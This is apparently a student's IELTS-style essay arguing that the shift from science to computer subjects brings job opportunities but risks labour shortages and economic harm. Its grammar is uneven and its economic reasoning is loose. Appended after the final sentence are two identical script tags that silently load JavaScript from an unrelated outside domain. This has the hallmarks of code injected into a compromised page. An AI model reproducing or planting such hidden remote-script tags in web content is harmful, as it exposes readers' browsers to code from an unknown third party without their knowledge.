Fewer students are studying science at school and university, favouring more computer-based subjects instead.

Is this a positive or negative development? What are the reasons for this?

Nowadays, students are more interested in technology-based subjects rather than science disciplines. There are many reasons for this change. In my opinion, the interest in computer subject has a positive impact on our life. However, it also has plenty of backfires which can affect to society. This essay will discuss both positive and negative aspects and explain the reason why it happens.

To begin with, a range of job opportunities after they graduated is the top point that advises students to focus on and choose to study computer based education. Due to the development of technology, companies are likely to use machines which controlled by computer in their process. It can be seen that the company will bring a lot of benefits to their employee who works in the computer field. As a result, this has a positive effect on them.

On the other hand, the consequence of being not balance between technology and science subjects can have a bad impact to the economy. The labor shortage will get more serious in science disciplines if the number of people who apply for a technological job still rise .For this reason, unemployment rate is getting higher.In addition to this, the inflation of consumer prices will be the drawback to the development of an economy.

To sum up, the importance of the computing industry in today’s world is given many advantages for students. However, if this is at the expense of having more unemployed and the difference between two fields of jobs, then it is also detrimental.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>